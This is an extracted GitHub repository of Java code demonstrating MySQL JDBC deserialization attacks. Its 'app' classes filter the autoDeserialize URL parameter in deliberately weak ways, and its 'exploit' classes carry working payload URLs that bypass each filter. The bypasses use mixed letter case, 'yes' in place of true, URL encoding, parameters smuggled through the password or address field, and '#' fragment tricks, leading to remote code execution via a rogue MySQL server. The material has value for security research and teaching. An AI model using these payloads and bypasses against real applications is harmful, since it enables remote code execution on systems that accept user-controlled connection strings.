Repository: Y4Sec-Team/mysql-jdbc-tricks
Branch: master
Commit: dfc4f920ef75
Files: 26
Total size: 21.4 KB
Directory structure:
gitextract_z5ohkhvb/
├── .gitignore
├── README.md
├── pom.xml
└── src/
└── main/
└── java/
└── org/
└── y4sec/
└── team/
├── app/
│ ├── Application1.java
│ ├── Application10.java
│ ├── Application2.java
│ ├── Application3.java
│ ├── Application4.java
│ ├── Application5.java
│ ├── Application6.java
│ ├── Application7.java
│ ├── Application8.java
│ └── Application9.java
└── exploit/
├── Example1.java
├── Example10.java
├── Example2.java
├── Example3.java
├── Example4.java
├── Example5.java
├── Example6.java
├── Example7.java
├── Example7Bypass.java
├── Example8.java
├── Example8Bypass.java
├── Example9.java
└── Example9Bypass.java
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
target/
!.mvn/wrapper/maven-wrapper.jar
!**/src/main/**/target/
!**/src/test/**/target/
### IntelliJ IDEA ###
.idea/modules.xml
.idea/jarRepositories.xml
.idea/compiler.xml
.idea/libraries/
*.iws
*.iml
*.ipr
### Eclipse ###
.apt_generated
.classpath
.factorypath
.project
.settings
.springBeans
.sts4-cache
### NetBeans ###
/nbproject/private/
/nbbuild/
/dist/
/nbdist/
/.nb-gradle/
build/
!**/src/main/**/build/
!**/src/test/**/build/
### VS Code ###
.vscode/
### Mac OS ###
.DS_Store
.idea/
================================================
FILE: README.md
================================================
## mysql-jdbc-tricks
这里是很多`MySQL JDBC Attack`的小技巧,我仅在`MySQL`的`JDBC`驱动中测试,这里的技巧可能在其他类型的数据库驱动中也存在
文章:https://mp.weixin.qq.com/s/lmoWKK41ZQzZOh-P26VUng
推荐搭建:推荐配合 https://github.com/4ra1n/mysql-fake-server 使用
### 基本示例
参考`Application1`和`Example1`代码
这是一个不存在任何过滤的情况,直接执行即可`RCE`
### 大小写绕过
参考`Application1`和`Example1`代码
这里展示了一种简单的防护和绕过,`MySQL`驱动对于连接参数的大小不做限制,如果开发者不做大小写限制,将会被轻易饶过
### YES绕过
参考`Application3`和`Example3`代码
这里展示了一种简单的防护和绕过,`MySQL`驱动允许的`Bool`值是包含`true/yes`两种的,因此存在一种绕过
### 编码绕过
参考`Application4`和`Example4`代码
这里展示了某些情况下的绕过,`MySQL`驱动允许`URL`编码,因此如果开发者没有按照标准`URL`解析和过滤,将会存在绕过
### 暂时的安全
参考`Application5`和`Example5`代码
对于这种情况,似乎是安全了,或许有其他的绕过?
### 另一种形式的传参
参考`Application6`和`Example6`代码
这也是`JDBC`攻击很常见的一种情况
### 额外参数检查绕过
参考`Application7`和`Example7Bypass`代码
限制额外连接参数情况下如何绕过
### 特殊情况下的#号绕过
参考`Application8`和`Example8Bypass`代码
一种特殊情况的绕过,属于一种逻辑漏洞
### 另一种特殊场景的绕过
参考`Application9`和`Example9Bypass`代码
另一种特殊情况的绕过,开发者忽略某些参数过滤导致的绕过
### 可能安全
参考`Application10`和`Example10`代码
对于这种情况,似乎是安全了,或许有其他的绕过?
================================================
FILE: pom.xml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>org.y4sec</groupId>
<artifactId>mysql-jdbc-tricks</artifactId>
<version>1.0</version>
<properties>
<maven.compiler.source>8</maven.compiler.source>
<maven.compiler.target>8</maven.compiler.target>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
<dependencies>
<dependency>
<groupId>mysql</groupId>
<artifactId>mysql-connector-java</artifactId>
<version>6.0.2</version>
</dependency>
<dependency>
<groupId>commons-beanutils</groupId>
<artifactId>commons-beanutils</artifactId>
<version>1.9.4</version>
</dependency>
</dependencies>
</project>
================================================
FILE: src/main/java/org/y4sec/team/app/Application1.java
================================================
package org.y4sec.team.app;
import java.sql.DriverManager;
public class Application1 {
public static void connection(String url){
try {
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application10.java
================================================
package org.y4sec.team.app;
import java.sql.DriverManager;
public class Application10 {
public static void connection(String addr, String user, String db, String password, String extra) {
try {
String url = String.format("jdbc:mysql://%s/%s?", addr, db);
StringBuilder sb = new StringBuilder();
sb.append("user=");
sb.append(check(user));
sb.append("&");
sb.append("password=");
sb.append(check(password));
if (!extra.equals("")) {
sb.append("&");
sb.append(check(extra));
}
url = url + sb;
check(url);
System.out.println(url);
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
private static String check(String params) {
if (params.contains("autoDeserialize")) {
throw new RuntimeException("you are hacker");
}
return params;
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application2.java
================================================
package org.y4sec.team.app;
import java.net.URI;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;
public class Application2 {
public static void connection(String url){
try {
if(!check(url)) {
System.out.println("you are hacker");
return;
}
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
private static boolean check(String jdbcUrl){
try {
Map<String, String> params = new HashMap<>();
String query = jdbcUrl.split("\\?")[1];
if (query != null) {
String[] pairs = query.split("&");
for (String pair : pairs) {
String[] keyValue = pair.split("=");
String key = keyValue[0];
String value = keyValue.length > 1 ? keyValue[1] : "";
params.put(key, value);
}
}
System.out.println("Params: " + params);
for (Map.Entry<String,String> p: params.entrySet()){
if (p.getKey().equals("autoDeserialize")) {
if(p.getValue().equals("true")){
return false;
}
}
}
return true;
} catch (Exception e) {
e.printStackTrace();
return false;
}
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application3.java
================================================
package org.y4sec.team.app;
import java.net.URI;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;
public class Application3 {
public static void connection(String url){
try {
if(!check(url)) {
System.out.println("you are hacker");
return;
}
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
private static boolean check(String jdbcUrl){
try {
Map<String, String> params = new HashMap<>();
String query = jdbcUrl.split("\\?")[1];
if (query != null) {
String[] pairs = query.split("&");
for (String pair : pairs) {
String[] keyValue = pair.split("=");
String key = keyValue[0];
String value = keyValue.length > 1 ? keyValue[1] : "";
params.put(key, value);
}
}
System.out.println("Params: " + params);
for (Map.Entry<String,String> p: params.entrySet()){
if (p.getKey().equals("autoDeserialize")) {
String value = p.getValue();
value = value.toLowerCase();
if(value.equals("true")){
return false;
}
}
}
return true;
} catch (Exception e) {
e.printStackTrace();
return false;
}
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application4.java
================================================
package org.y4sec.team.app;
import java.net.URI;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;
public class Application4 {
public static void connection(String url) {
try {
if (!check(url)) {
System.out.println("you are hacker");
return;
}
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
private static boolean check(String jdbcUrl) {
try {
Map<String, String> params = new HashMap<>();
String query = jdbcUrl.split("\\?")[1];
if (query != null) {
String[] pairs = query.split("&");
for (String pair : pairs) {
String[] keyValue = pair.split("=");
String key = keyValue[0];
String value = keyValue.length > 1 ? keyValue[1] : "";
params.put(key, value);
}
}
System.out.println("Params: " + params);
for (Map.Entry<String, String> p : params.entrySet()) {
if (p.getKey().equals("autoDeserialize")) {
String value = p.getValue();
value = value.toLowerCase();
if (value.equals("true") || value.equals("yes")) {
return false;
}
}
}
return true;
} catch (Exception e) {
e.printStackTrace();
return false;
}
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application5.java
================================================
package org.y4sec.team.app;
import java.net.URI;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;
public class Application5 {
public static void connection(String url) {
try {
if (!check(url)) {
System.out.println("you are hacker");
return;
}
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
private static boolean check(String jdbcUrl) {
try {
URI uri = new URI(jdbcUrl.replace("jdbc:", ""));
String host = uri.getHost();
int port = uri.getPort();
String path = uri.getPath();
String dbname = path.substring(1);
Map<String, String> params = new HashMap<>();
String query = uri.getQuery();
if (query != null) {
String[] pairs = query.split("&");
for (String pair : pairs) {
String[] keyValue = pair.split("=");
String key = keyValue[0];
String value = keyValue.length > 1 ? keyValue[1] : "";
params.put(key, value);
}
}
System.out.println("Host: " + host);
System.out.println("Port: " + port);
System.out.println("DB Name: " + dbname);
System.out.println("Params: " + params);
for (Map.Entry<String, String> p : params.entrySet()) {
if (p.getKey().equals("autoDeserialize")) {
String value = p.getValue();
value = value.toLowerCase();
if (value.equals("true") || value.equals("yes")) {
return false;
}
}
}
return true;
} catch (Exception e) {
e.printStackTrace();
return false;
}
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application6.java
================================================
package org.y4sec.team.app;
import java.net.URLDecoder;
import java.sql.DriverManager;
public class Application6 {
public static void connection(String addr,String user,String db,String password,String extra) {
try {
String url = String.format("jdbc:mysql://%s/%s?",addr,db);
StringBuilder sb = new StringBuilder();
sb.append("user=");
sb.append(user);
sb.append("&");
sb.append("password=");
sb.append(password);
if (!extra.equals("")){
sb.append("&");
sb.append(extra);
}
url = url + sb;
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application7.java
================================================
package org.y4sec.team.app;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;
public class Application7 {
public static void connection(String addr,String user,String db,String password,String extra) {
try {
String url = String.format("jdbc:mysql://%s/%s?",addr,db);
StringBuilder sb = new StringBuilder();
sb.append("user=");
sb.append(user);
sb.append("&");
sb.append("password=");
sb.append(password);
if (!check(extra)){
System.out.println("you are hacker");
return;
}
if (!extra.equals("")){
sb.append("&");
sb.append(extra);
}
url = url + sb;
System.out.println(url);
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
private static boolean check(String params){
try {
return !params.contains("autoDeserialize");
} catch (Exception e) {
e.printStackTrace();
return false;
}
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application8.java
================================================
package org.y4sec.team.app;
import java.sql.DriverManager;
public class Application8 {
public static void connection(String addr, String user, String db, String password, String extra) {
try {
String url = String.format("jdbc:mysql://%s/%s?", addr, db);
StringBuilder sb = new StringBuilder();
sb.append("user=");
sb.append(user);
sb.append("&");
sb.append("password=");
sb.append(password);
if (!check(extra)) {
System.out.println("you are hacker");
return;
}
if (!extra.equals("")) {
sb.append("&");
sb.append(extra);
}
if (url.endsWith("?")) {
url = url + sb + "autoDeserialize=false";
} else {
url = url + sb + "&autoDeserialize=false";
}
System.out.println(url);
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
private static boolean check(String params) {
try {
return !params.contains("autoDeserialize");
} catch (Exception e) {
e.printStackTrace();
return false;
}
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application9.java
================================================
package org.y4sec.team.app;
import java.sql.DriverManager;
public class Application9 {
public static void connection(String addr, String user, String db, String password, String extra) {
try {
String url = String.format("jdbc:mysql://%s/%s?", addr, db);
StringBuilder sb = new StringBuilder();
sb.append("user=");
sb.append(check(user));
sb.append("&");
sb.append("password=");
sb.append(check(password));
if (!extra.equals("")) {
sb.append("&");
sb.append(check(extra));
}
url = url + sb;
System.out.println(url);
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
private static String check(String params) {
if (params.contains("autoDeserialize")) {
throw new RuntimeException("you are hacker");
}
return params;
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example1.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application1;
public class Example1 {
public static void main(String[] args) {
String addr = "127.0.0.1:62787";
String params = "detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe";
String url = String.format( "jdbc:mysql://%s/test?%s",addr,params);
Application1.connection(url);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example10.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application10;
public class Example10 {
public static void main(String[] args) {
// 可控内容
String addr = "127.0.0.1:62787/test?detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe&#";
String user = "deser_CB_calc.exe";
String password = "test";
String db = "test";
String extra = "";
Application10.connection(addr,user,db,password,extra);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example2.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application2;
public class Example2 {
public static void main(String[] args) {
String addr = "127.0.0.1:62787";
String params = "detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe";
String url = String.format("jdbc:mysql://%s/test?%s", addr, params);
Application2.connection(url);
addr = "127.0.0.1:62787";
params = "detectCustomCollations=true&autoDeserialize=tRue&user=deser_CB_calc.exe";
url = String.format("jdbc:mysql://%s/test?%s", addr, params);
Application2.connection(url);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example3.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application3;
public class Example3 {
public static void main(String[] args) {
String addr = "127.0.0.1:62787";
String params = "detectCustomCollations=true&autoDeserialize=tRue&user=deser_CB_calc.exe";
String url = String.format("jdbc:mysql://%s/test?%s", addr, params);
Application3.connection(url);
addr = "127.0.0.1:62787";
params = "detectCustomCollations=true&autoDeserialize=yes&user=deser_CB_calc.exe";
url = String.format("jdbc:mysql://%s/test?%s", addr, params);
Application3.connection(url);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example4.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application4;
public class Example4 {
public static void main(String[] args) {
String addr = "127.0.0.1:62787";
String params = "detectCustomCollations=true&autoDeserialize=yes&user=deser_CB_calc.exe";
String url = String.format("jdbc:mysql://%s/test?%s", addr, params);
Application4.connection(url);
addr = "127.0.0.1:62787";
params = "detectCustomCollations=true&autoDeserialize=%74%72%75%65&user=deser_CB_calc.exe";
url = String.format("jdbc:mysql://%s/test?%s", addr, params);
Application4.connection(url);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example5.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application5;
public class Example5 {
public static void main(String[] args) {
String addr = "127.0.0.1:62787";
String params = "detectCustomCollations=true&autoDeserialize=%74%72%75%65&user=deser_CB_calc.exe";
String url = String.format("jdbc:mysql://%s/test?%s", addr, params);
Application5.connection(url);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example6.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application6;
public class Example6 {
public static void main(String[] args) {
// 可控内容
String addr = "127.0.0.1:62787";
String user = "deser_CB_calc.exe";
String password = "test";
String db = "test";
String extra = "detectCustomCollations=true&autoDeserialize=true";
Application6.connection(addr,user,db,password,extra);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example7.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application7;
public class Example7 {
public static void main(String[] args) {
// 可控内容
String addr = "127.0.0.1:62787";
String user = "deser_CB_calc.exe";
String password = "test";
String db = "test";
String extra = "detectCustomCollations=true&autoDeserialize=true";
Application7.connection(addr,user,db,password,extra);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example7Bypass.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application7;
public class Example7Bypass {
public static void main(String[] args) {
// 可控内容
String addr = "127.0.0.1:62787";
String user = "deser_CB_calc.exe";
String password = "test&autoDeserialize=true&";
String db = "test";
String extra = "detectCustomCollations=true&";
Application7.connection(addr,user,db,password,extra);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example8.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application8;
public class Example8 {
public static void main(String[] args) {
// 可控内容
String addr = "127.0.0.1:62787";
String user = "deser_CB_calc.exe";
String password = "test&autoDeserialize=true&";
String db = "test";
String extra = "detectCustomCollations=true&";
Application8.connection(addr,user,db,password,extra);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example8Bypass.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application8;
public class Example8Bypass {
public static void main(String[] args) {
// 可控内容
String addr = "127.0.0.1:62787";
String user = "deser_CB_calc.exe";
String password = "test&autoDeserialize=true";
String db = "test";
String extra = "detectCustomCollations=true&#?";
Application8.connection(addr,user,db,password,extra);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example9.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application9;
public class Example9 {
public static void main(String[] args) {
// 可控内容
String addr = "127.0.0.1:62787";
String user = "deser_CB_calc.exe";
String password = "test&autoDeserialize=true&";
String db = "test";
String extra = "detectCustomCollations=true&";
Application9.connection(addr,user,db,password,extra);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example9Bypass.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application9;
public class Example9Bypass {
public static void main(String[] args) {
// 可控内容
String addr = "127.0.0.1:62787/test?detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe&#";
String user = "deser_CB_calc.exe";
String password = "test";
String db = "test";
String extra = "";
Application9.connection(addr,user,db,password,extra);
}
}
gitextract_z5ohkhvb/
├── .gitignore
├── README.md
├── pom.xml
└── src/
└── main/
└── java/
└── org/
└── y4sec/
└── team/
├── app/
│ ├── Application1.java
│ ├── Application10.java
│ ├── Application2.java
│ ├── Application3.java
│ ├── Application4.java
│ ├── Application5.java
│ ├── Application6.java
│ ├── Application7.java
│ ├── Application8.java
│ └── Application9.java
└── exploit/
├── Example1.java
├── Example10.java
├── Example2.java
├── Example3.java
├── Example4.java
├── Example5.java
├── Example6.java
├── Example7.java
├── Example7Bypass.java
├── Example8.java
├── Example8Bypass.java
├── Example9.java
└── Example9Bypass.java
SYMBOL INDEX (54 symbols across 23 files)
FILE: src/main/java/org/y4sec/team/app/Application1.java
class Application1 (line 5) | public class Application1 {
method connection (line 6) | public static void connection(String url){
FILE: src/main/java/org/y4sec/team/app/Application10.java
class Application10 (line 5) | public class Application10 {
method connection (line 6) | public static void connection(String addr, String user, String db, Str...
method check (line 35) | private static String check(String params) {
FILE: src/main/java/org/y4sec/team/app/Application2.java
class Application2 (line 8) | public class Application2 {
method connection (line 9) | public static void connection(String url){
method check (line 22) | private static boolean check(String jdbcUrl){
FILE: src/main/java/org/y4sec/team/app/Application3.java
class Application3 (line 8) | public class Application3 {
method connection (line 9) | public static void connection(String url){
method check (line 22) | private static boolean check(String jdbcUrl){
FILE: src/main/java/org/y4sec/team/app/Application4.java
class Application4 (line 8) | public class Application4 {
method connection (line 9) | public static void connection(String url) {
method check (line 22) | private static boolean check(String jdbcUrl) {
FILE: src/main/java/org/y4sec/team/app/Application5.java
class Application5 (line 8) | public class Application5 {
method connection (line 9) | public static void connection(String url) {
method check (line 22) | private static boolean check(String jdbcUrl) {
FILE: src/main/java/org/y4sec/team/app/Application6.java
class Application6 (line 6) | public class Application6 {
method connection (line 7) | public static void connection(String addr,String user,String db,String...
FILE: src/main/java/org/y4sec/team/app/Application7.java
class Application7 (line 7) | public class Application7 {
method connection (line 8) | public static void connection(String addr,String user,String db,String...
method check (line 40) | private static boolean check(String params){
FILE: src/main/java/org/y4sec/team/app/Application8.java
class Application8 (line 5) | public class Application8 {
method connection (line 6) | public static void connection(String addr, String user, String db, Str...
method check (line 42) | private static boolean check(String params) {
FILE: src/main/java/org/y4sec/team/app/Application9.java
class Application9 (line 5) | public class Application9 {
method connection (line 6) | public static void connection(String addr, String user, String db, Str...
method check (line 33) | private static String check(String params) {
FILE: src/main/java/org/y4sec/team/exploit/Example1.java
class Example1 (line 5) | public class Example1 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example10.java
class Example10 (line 5) | public class Example10 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example2.java
class Example2 (line 5) | public class Example2 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example3.java
class Example3 (line 5) | public class Example3 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example4.java
class Example4 (line 5) | public class Example4 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example5.java
class Example5 (line 5) | public class Example5 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example6.java
class Example6 (line 5) | public class Example6 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example7.java
class Example7 (line 5) | public class Example7 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example7Bypass.java
class Example7Bypass (line 5) | public class Example7Bypass {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example8.java
class Example8 (line 5) | public class Example8 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example8Bypass.java
class Example8Bypass (line 5) | public class Example8Bypass {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example9.java
class Example9 (line 5) | public class Example9 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example9Bypass.java
class Example9Bypass (line 5) | public class Example9Bypass {
method main (line 6) | public static void main(String[] args) {
Condensed preview — 26 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (26K chars).
[
{
"path": ".gitignore",
"chars": 498,
"preview": "target/\n!.mvn/wrapper/maven-wrapper.jar\n!**/src/main/**/target/\n!**/src/test/**/target/\n\n### IntelliJ IDEA ###\n.idea/mod"
},
{
"path": "README.md",
"chars": 1014,
"preview": "## mysql-jdbc-tricks\n\n这里是很多`MySQL JDBC Attack`的小技巧,我仅在`MySQL`的`JDBC`驱动中测试,这里的技巧可能在其他类型的数据库驱动中也存在\n\n文章:https://mp.weixin.q"
},
{
"path": "pom.xml",
"chars": 1044,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project xmlns=\"http://maven.apache.org/POM/4.0.0\"\n xmlns:xsi=\"http://www"
},
{
"path": "src/main/java/org/y4sec/team/app/Application1.java",
"chars": 334,
"preview": "package org.y4sec.team.app;\n\nimport java.sql.DriverManager;\n\npublic class Application1 {\n public static void connecti"
},
{
"path": "src/main/java/org/y4sec/team/app/Application10.java",
"chars": 1105,
"preview": "package org.y4sec.team.app;\n\nimport java.sql.DriverManager;\n\npublic class Application10 {\n public static void connect"
},
{
"path": "src/main/java/org/y4sec/team/app/Application2.java",
"chars": 1540,
"preview": "package org.y4sec.team.app;\n\nimport java.net.URI;\nimport java.sql.DriverManager;\nimport java.util.HashMap;\nimport java.u"
},
{
"path": "src/main/java/org/y4sec/team/app/Application3.java",
"chars": 1631,
"preview": "package org.y4sec.team.app;\n\nimport java.net.URI;\nimport java.sql.DriverManager;\nimport java.util.HashMap;\nimport java.u"
},
{
"path": "src/main/java/org/y4sec/team/app/Application4.java",
"chars": 1662,
"preview": "package org.y4sec.team.app;\n\nimport java.net.URI;\nimport java.sql.DriverManager;\nimport java.util.HashMap;\nimport java.u"
},
{
"path": "src/main/java/org/y4sec/team/app/Application5.java",
"chars": 2035,
"preview": "package org.y4sec.team.app;\n\nimport java.net.URI;\nimport java.sql.DriverManager;\nimport java.util.HashMap;\nimport java.u"
},
{
"path": "src/main/java/org/y4sec/team/app/Application6.java",
"chars": 843,
"preview": "package org.y4sec.team.app;\n\nimport java.net.URLDecoder;\nimport java.sql.DriverManager;\n\npublic class Application6 {\n "
},
{
"path": "src/main/java/org/y4sec/team/app/Application7.java",
"chars": 1254,
"preview": "package org.y4sec.team.app;\n\nimport java.sql.DriverManager;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic clas"
},
{
"path": "src/main/java/org/y4sec/team/app/Application8.java",
"chars": 1376,
"preview": "package org.y4sec.team.app;\n\nimport java.sql.DriverManager;\n\npublic class Application8 {\n public static void connecti"
},
{
"path": "src/main/java/org/y4sec/team/app/Application9.java",
"chars": 1079,
"preview": "package org.y4sec.team.app;\n\nimport java.sql.DriverManager;\n\npublic class Application9 {\n public static void connecti"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example1.java",
"chars": 406,
"preview": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application1;\n\npublic class Example1 {\n public static void"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example10.java",
"chars": 485,
"preview": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application10;\n\npublic class Example10 {\n public static vo"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example2.java",
"chars": 643,
"preview": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application2;\n\npublic class Example2 {\n public static void"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example3.java",
"chars": 642,
"preview": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application3;\n\npublic class Example3 {\n public static void"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example4.java",
"chars": 650,
"preview": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application4;\n\npublic class Example4 {\n public static void"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example5.java",
"chars": 415,
"preview": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application5;\n\npublic class Example5 {\n public static void"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example6.java",
"chars": 451,
"preview": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application6;\n\npublic class Example6 {\n public static void"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example7.java",
"chars": 451,
"preview": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application7;\n\npublic class Example7 {\n public static void"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example7Bypass.java",
"chars": 459,
"preview": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application7;\n\npublic class Example7Bypass {\n public stati"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example8.java",
"chars": 453,
"preview": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application8;\n\npublic class Example8 {\n public static void"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example8Bypass.java",
"chars": 460,
"preview": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application8;\n\npublic class Example8Bypass {\n public stati"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example9.java",
"chars": 453,
"preview": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application9;\n\npublic class Example9 {\n public static void"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example9Bypass.java",
"chars": 488,
"preview": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application9;\n\npublic class Example9Bypass {\n public stati"
}
]
About this extraction
This page contains the full source code of the Y4Sec-Team/mysql-jdbc-tricks GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 26 files (21.4 KB), approximately 5.9k tokens, and a symbol index with 54 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.